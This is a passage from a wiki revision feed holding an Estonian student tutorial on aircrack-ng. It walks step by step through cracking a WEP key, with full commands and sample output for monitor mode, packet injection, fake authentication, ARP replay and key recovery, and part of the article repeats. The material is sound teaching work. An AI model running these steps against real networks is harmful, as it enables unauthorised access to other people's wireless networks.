       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89315</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89315"/>
		<updated>2015-05-25T19:37:18Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* WEP võtme murdmine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
